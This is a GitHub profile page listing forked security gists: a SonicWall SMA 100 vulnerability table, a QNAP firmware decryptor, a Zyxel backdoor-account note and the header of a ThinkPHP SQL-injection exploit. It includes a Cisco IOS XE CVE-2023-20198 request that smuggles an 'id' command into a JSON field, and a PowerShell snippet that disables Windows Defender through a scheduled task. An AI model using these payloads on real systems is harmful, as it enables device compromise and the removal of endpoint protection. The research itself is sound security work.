Skip to content

Instantly share code, notes, and snippets.

View imjdl's full-sized avatar
🎯
Focusing

soap imjdl

🎯
Focusing
144 followers · 368 following
  • https://rustlang.rs
View GitHub Profile
@imjdl
imjdl / sonicwall_sma_100_0_day.md
Created May 15, 2025 10:21 — forked from jbaines-r7/sonicwall_sma_100_0_day.md
Sonicwall SMA 100 Series 0-day

The following issues are unpatched vulnerabilities in SonicWall's SMA 100 Series. Testing was done using SMA 500v using firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. Because these two versions are substantially different under the hood, not all of the issues affect both versions. As such, for each issue I'll call out specifically which versions are affected. Note that no testing was done on the 10.2.0.x version line.

Summary

Vector Auth Affected Component Vulnerability Vector
Remote Unauthenticated 10.2.1.1-19sv httpd Stack-based buffer overflow AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Remote Authenticated Both Multiple cgi Command injection AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Remote Unauthenticated 10.2.1.1-19sv sonicfiles File upload path traversal AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Remote Unauthenticated Both sonicfiles CPU exhaustion AV:N
@imjdl
imjdl / qnap-qts-fw-cryptor.py
Created May 10, 2024 14:18 — forked from ulidtko/qnap-qts-fw-cryptor.py
QNAP QTS firmware encryptor/decryptor.
#!/usr/bin/env python3
import os, sys
import argparse
import struct
from functools import reduce
"""
QNAP QTS firmware encryptor/decryptor.
Based on https://pastebin.com/KHbX85nG
@imjdl
imjdl / gist:779b64aadbaa5382869c81c4b7664698
Created November 7, 2023 10:54 — forked from rashimo/gist:a0ef01bc02e5e9fdf46bc4f3b5193cbf
Chain of Cisco IOS XE CVE-2023-20198 commands
## a POST request as:
POST /webui/rest/softwareMgmt/installAdd HTTP/1.1
{"filePath": "abc/aaa", "fileSystem": "", "ipaddress": "1:1:1:;id>/bootflash/PaJbOLOT;#", "mode": "tftp", "operation_type": "SMU"}
## then another command with the POC technique:
dir bootflash: | include PaJbOLOT
@imjdl
imjdl / Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Created December 29, 2020 04:29 — forked from numanturle/Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
131072 0x20000 JFFS2 filesystem, big endian
JFFS2 filesystem extract
total 1492
1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 .
@imjdl
imjdl / doh.ps1
Created May 8, 2020 03:39 — forked from tyranid/doh.ps1
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@imjdl
imjdl / exp.py
Created October 19, 2018 07:55
ThinkPHP5.0.14-ThinkPHP5.0.15SQl注入漏洞exp
#!/usr/bin/env python3
# coding = UTF-8
import sys
import requests
import time
from threading import Thread
from threading import Lock
import argparse